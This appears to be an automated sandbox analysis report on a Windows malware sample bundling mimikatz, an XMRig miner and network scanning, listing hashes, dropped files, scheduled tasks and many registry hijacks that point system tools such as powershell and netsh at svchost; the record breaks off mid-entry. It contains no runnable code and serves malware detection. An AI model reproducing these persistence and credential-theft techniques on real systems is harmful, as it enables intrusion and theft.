Analysis
-
max time kernel
151s -
max time network
178s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
07-04-2024 23:27
Behavioral task
behavioral1
Sample
2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe
Resource
win7-20240220-en
General
-
Target
2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe
-
Size
10.8MB
-
MD5
52e2e34e9b5a6136df55f31ad0891e02
-
SHA1
df83b35207901fdf28714c4b95f2ebd06a2c94b8
-
SHA256
1e7ee52c8a07bde261b71574bf7bbcb7bf9ce1bd2524270498aeb30869ddb0fb
-
SHA512
ca361c6c0f65bb6e3f1b6c68433acbd0a505e56a6b931171b808c09d5a9916c12971a306525f0be3f52ca345bd57c31cdaaf2223e8a58819cde73d6e6f45e629
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
bbleyvb.exedescription pid process target process PID 1856 created 2152 1856 bbleyvb.exe spoolsv.exe -
Contacts a large (26750) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4740-136-0x00007FF69A2E0000-0x00007FF69A3CE000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 39 IoCs
Processes:
resource yara_rule behavioral2/memory/1668-0-0x0000000000400000-0x0000000000AA4000-memory.dmp UPX C:\Windows\kmydietv\bbleyvb.exe UPX behavioral2/memory/4952-7-0x0000000000400000-0x0000000000AA4000-memory.dmp UPX C:\Windows\nzlegstrv\Corporate\vfshost.exe UPX behavioral2/memory/4740-135-0x00007FF69A2E0000-0x00007FF69A3CE000-memory.dmp UPX behavioral2/memory/4740-136-0x00007FF69A2E0000-0x00007FF69A3CE000-memory.dmp UPX C:\Windows\Temp\nzlegstrv\hmuzmiedp.exe UPX behavioral2/memory/1292-140-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp UPX behavioral2/memory/1292-143-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp UPX C:\Windows\Temp\urfucfzpe\ecfkkq.exe UPX behavioral2/memory/872-147-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp UPX behavioral2/memory/3944-156-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp UPX behavioral2/memory/4860-174-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp UPX behavioral2/memory/872-176-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp UPX behavioral2/memory/776-180-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp UPX behavioral2/memory/760-184-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp UPX behavioral2/memory/1276-188-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp UPX behavioral2/memory/872-194-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp UPX behavioral2/memory/2248-197-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp UPX behavioral2/memory/2448-201-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp UPX behavioral2/memory/920-205-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp UPX behavioral2/memory/872-207-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp UPX behavioral2/memory/1252-210-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp UPX behavioral2/memory/4652-214-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp UPX behavioral2/memory/872-216-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp UPX behavioral2/memory/2024-219-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp UPX behavioral2/memory/4640-223-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp UPX behavioral2/memory/872-225-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp UPX behavioral2/memory/5012-228-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp UPX behavioral2/memory/5060-231-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp UPX behavioral2/memory/2264-233-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp UPX behavioral2/memory/872-243-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp UPX behavioral2/memory/5540-246-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp UPX behavioral2/memory/4576-248-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp UPX behavioral2/memory/872-249-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp UPX behavioral2/memory/872-251-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp UPX behavioral2/memory/872-253-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp UPX behavioral2/memory/872-254-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp UPX behavioral2/memory/872-256-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp UPX -
XMRig Miner payload 11 IoCs
Processes:
resource yara_rule behavioral2/memory/872-176-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp xmrig behavioral2/memory/872-194-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp xmrig behavioral2/memory/872-207-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp xmrig behavioral2/memory/872-216-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp xmrig behavioral2/memory/872-225-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp xmrig behavioral2/memory/872-243-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp xmrig behavioral2/memory/872-249-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp xmrig behavioral2/memory/872-251-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp xmrig behavioral2/memory/872-253-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp xmrig behavioral2/memory/872-254-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp xmrig behavioral2/memory/872-256-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 4 IoCs
Processes:
resource yara_rule behavioral2/memory/1668-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz C:\Windows\kmydietv\bbleyvb.exe mimikatz behavioral2/memory/4952-7-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/4740-136-0x00007FF69A2E0000-0x00007FF69A3CE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
bbleyvb.exewpcap.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts bbleyvb.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts bbleyvb.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 1564 netsh.exe 1736 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
Processes:
bbleyvb.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbleyvb.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe bbleyvb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bbleyvb.exe -
Executes dropped EXE 29 IoCs
Processes:
bbleyvb.exebbleyvb.exewpcap.exelcsfzibut.exevfshost.exehmuzmiedp.exeecfkkq.exehmuzmiedp.exexohudmc.exetyxtue.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exebbleyvb.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exezbesiipnm.exehmuzmiedp.exehmuzmiedp.exebbleyvb.exepid process 4952 bbleyvb.exe 1856 bbleyvb.exe 4960 wpcap.exe 4564 lcsfzibut.exe 4740 vfshost.exe 1292 hmuzmiedp.exe 872 ecfkkq.exe 3944 hmuzmiedp.exe 2508 xohudmc.exe 3860 tyxtue.exe 4860 hmuzmiedp.exe 776 hmuzmiedp.exe 760 hmuzmiedp.exe 1276 hmuzmiedp.exe 4224 bbleyvb.exe 2248 hmuzmiedp.exe 2448 hmuzmiedp.exe 920 hmuzmiedp.exe 1252 hmuzmiedp.exe 4652 hmuzmiedp.exe 2024 hmuzmiedp.exe 4640 hmuzmiedp.exe 5012 hmuzmiedp.exe 5060 hmuzmiedp.exe 2264 hmuzmiedp.exe 3044 zbesiipnm.exe 5540 hmuzmiedp.exe 4576 hmuzmiedp.exe 6004 bbleyvb.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exelcsfzibut.exepid process 4960 wpcap.exe 4960 wpcap.exe 4960 wpcap.exe 4960 wpcap.exe 4960 wpcap.exe 4960 wpcap.exe 4960 wpcap.exe 4960 wpcap.exe 4960 wpcap.exe 4564 lcsfzibut.exe 4564 lcsfzibut.exe 4564 lcsfzibut.exe -
Processes:
resource yara_rule C:\Windows\nzlegstrv\Corporate\vfshost.exe upx behavioral2/memory/4740-135-0x00007FF69A2E0000-0x00007FF69A3CE000-memory.dmp upx behavioral2/memory/4740-136-0x00007FF69A2E0000-0x00007FF69A3CE000-memory.dmp upx C:\Windows\Temp\nzlegstrv\hmuzmiedp.exe upx behavioral2/memory/1292-140-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp upx behavioral2/memory/1292-143-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp upx C:\Windows\Temp\urfucfzpe\ecfkkq.exe upx behavioral2/memory/872-147-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp upx behavioral2/memory/3944-156-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp upx behavioral2/memory/4860-174-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp upx behavioral2/memory/872-176-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp upx behavioral2/memory/776-180-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp upx behavioral2/memory/760-184-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp upx behavioral2/memory/1276-188-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp upx behavioral2/memory/872-194-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp upx behavioral2/memory/2248-197-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp upx behavioral2/memory/2448-201-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp upx behavioral2/memory/920-205-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp upx behavioral2/memory/872-207-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp upx behavioral2/memory/1252-210-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp upx behavioral2/memory/4652-214-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp upx behavioral2/memory/872-216-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp upx behavioral2/memory/2024-219-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp upx behavioral2/memory/4640-223-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp upx behavioral2/memory/872-225-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp upx behavioral2/memory/5012-228-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp upx behavioral2/memory/5060-231-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp upx behavioral2/memory/2264-233-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp upx behavioral2/memory/872-243-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp upx behavioral2/memory/5540-246-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp upx behavioral2/memory/4576-248-0x00007FF6D6F30000-0x00007FF6D6F8B000-memory.dmp upx behavioral2/memory/872-249-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp upx behavioral2/memory/872-251-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp upx behavioral2/memory/872-253-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp upx behavioral2/memory/872-254-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp upx behavioral2/memory/872-256-0x00007FF6BBBE0000-0x00007FF6BBD00000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 66 ifconfig.me 67 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
bbleyvb.exewpcap.exexohudmc.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache bbleyvb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData bbleyvb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content bbleyvb.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 bbleyvb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 bbleyvb.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\tyxtue.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE bbleyvb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies bbleyvb.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\tyxtue.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft bbleyvb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 bbleyvb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7ADF8A57305EF056A6A6A947A1CF4C7A bbleyvb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7ADF8A57305EF056A6A6A947A1CF4C7A bbleyvb.exe -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc process File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
bbleyvb.execmd.exezbesiipnm.exe2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exedescription ioc process File created C:\Windows\nzlegstrv\UnattendGC\specials\docmicfg.xml bbleyvb.exe File created C:\Windows\kmydietv\vimpcsvc.xml bbleyvb.exe File created C:\Windows\nzlegstrv\Corporate\vfshost.exe bbleyvb.exe File opened for modification C:\Windows\nzlegstrv\Corporate\log.txt cmd.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\ucl.dll bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\docmicfg.exe bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\Shellcode.ini bbleyvb.exe File created C:\Windows\nzlegstrv\yuiezklii\wpcap.exe bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\spoolsrv.xml bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\vimpcsvc.exe bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\svschost.xml bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\cnli-1.dll bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\zlib1.dll bbleyvb.exe File opened for modification C:\Windows\nzlegstrv\yuiezklii\Result.txt zbesiipnm.exe File created C:\Windows\nzlegstrv\yuiezklii\zbesiipnm.exe bbleyvb.exe File created C:\Windows\nzlegstrv\Corporate\mimilib.dll bbleyvb.exe File created C:\Windows\ime\bbleyvb.exe bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\libxml2.dll bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\svschost.xml bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\posh-0.dll bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\schoedcl.exe bbleyvb.exe File created C:\Windows\kmydietv\svschost.xml bbleyvb.exe File created C:\Windows\kmydietv\docmicfg.xml bbleyvb.exe File opened for modification C:\Windows\nzlegstrv\yuiezklii\Packet.dll bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\exma-1.dll bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\schoedcl.xml bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\ssleay32.dll bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\trch-1.dll bbleyvb.exe File created C:\Windows\nzlegstrv\upbdrjv\swrpwe.exe bbleyvb.exe File created C:\Windows\nzlegstrv\yuiezklii\ip.txt bbleyvb.exe File created C:\Windows\nzlegstrv\yuiezklii\lcsfzibut.exe bbleyvb.exe File created C:\Windows\kmydietv\schoedcl.xml bbleyvb.exe File opened for modification C:\Windows\kmydietv\schoedcl.xml bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\svschost.exe bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\schoedcl.xml bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\spoolsrv.xml bbleyvb.exe File created C:\Windows\nzlegstrv\Corporate\mimidrv.sys bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\tucl-1.dll bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\spoolsrv.exe bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\vimpcsvc.xml bbleyvb.exe File opened for modification C:\Windows\kmydietv\docmicfg.xml bbleyvb.exe File created C:\Windows\nzlegstrv\yuiezklii\scan.bat bbleyvb.exe File created C:\Windows\kmydietv\bbleyvb.exe 2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\crli-0.dll bbleyvb.exe File created C:\Windows\kmydietv\spoolsrv.xml bbleyvb.exe File opened for modification C:\Windows\kmydietv\svschost.xml bbleyvb.exe File opened for modification C:\Windows\kmydietv\bbleyvb.exe 2024-04-07_52e2e34e9b5a6136df55f31ad0891e02_hacktools_icedid_mimikatz.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\tibe-2.dll bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\libeay32.dll bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\trfo-2.dll bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\AppCapture64.dll bbleyvb.exe File created C:\Windows\nzlegstrv\yuiezklii\wpcap.dll bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\coli-0.dll bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\docmicfg.xml bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\vimpcsvc.xml bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\AppCapture32.dll bbleyvb.exe File created C:\Windows\nzlegstrv\yuiezklii\Packet.dll bbleyvb.exe File created C:\Windows\nzlegstrv\UnattendGC\specials\xdvl-0.dll bbleyvb.exe File opened for modification C:\Windows\kmydietv\spoolsrv.xml bbleyvb.exe File opened for modification C:\Windows\kmydietv\vimpcsvc.xml bbleyvb.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 4464 sc.exe 1048 sc.exe 3492 sc.exe 4512 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
Processes:
resource yara_rule C:\Windows\kmydietv\bbleyvb.exe nsis_installer_2 C:\Windows\nzlegstrv\yuiezklii\wpcap.exe nsis_installer_1 C:\Windows\nzlegstrv\yuiezklii\wpcap.exe nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 1736 schtasks.exe 2756 schtasks.exe 364 schtasks.exe -
Modifies data under HKEY_USERS 45 IoCs
Processes:
hmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exebbleyvb.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exehmuzmiedp.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hmuzmiedp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hmuzmiedp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hmuzmiedp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hmuzmiedp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hmuzmiedp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hmuzmiedp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hmuzmiedp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" hmuzmiedp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hmuzmiedp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump hmuzmiedp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing bbleyvb.exe Key created 